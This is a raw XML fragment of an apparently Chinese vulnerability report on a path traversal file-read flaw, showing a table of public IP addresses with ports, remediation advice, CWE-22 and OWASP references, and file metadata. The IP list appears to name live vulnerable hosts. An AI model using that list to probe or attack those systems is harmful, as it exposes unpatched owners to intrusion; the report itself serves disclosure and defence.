      <w:tr w14:paraId="73712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FECE43">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>222.215.40.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="573E66F0">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="55C9D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7F4426">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>175.44.137.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="5EEFC01A">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4AA7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2B9951">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>125.65.255.65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="66E04CE6">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F106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ECFD12">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>60.10.182.45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="676FC7DB">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7BCD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85AAFA">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>125.64.77.124</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="51924CF1">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F93C90F">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF82D83">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DD7FE0">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D6F13">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1458A01D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Implement strict path validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — sanitize all user-supplied file path parameters by removing or rejecting path traversal sequences (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>..\\</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBAC6D8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Use a whitelist approach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — restrict file access to a specific allowed directory and reject any path that resolves outside of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF180E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Canonicalize paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — resolve the canonical (absolute) path of the requested file and verify it resides within the permitted directory before serving it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F4179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Apply principle of least privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — run the application with minimal filesystem permissions to limit the impact of file read vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6C76B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Add authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — require proper authentication and authorization for sensitive file operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E3176">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9CA0CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1582D24B">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F85B50">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15503440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CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB01D1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CNVD (China National Vulnerability Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F1F630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OWASP Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F1AB0B">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B4705">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3B1B82">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BABC9C">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>This vulnerability was discovered and reported to CNCERT/CNVD on March 18, 2026.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8C762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598</Words>
  <Characters>4120</Characters>
  <TotalTime>8</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4762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2026-07-07T15:40:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>真开心</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-07T15:49:27Z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eyJoZGlkIjoiMjg2NDcwMzYzZGZhZjU0ZTMxNzc2N2QxOGQyNzUzYWMiLCJ1c2VySWQiOiIxMzg5NjE5NjU0In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.26895</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>3BC820EE10AB4CCB87FE805FDD0CB9EB_12</vt:lpwstr>
  </property>
</Properties>
</file>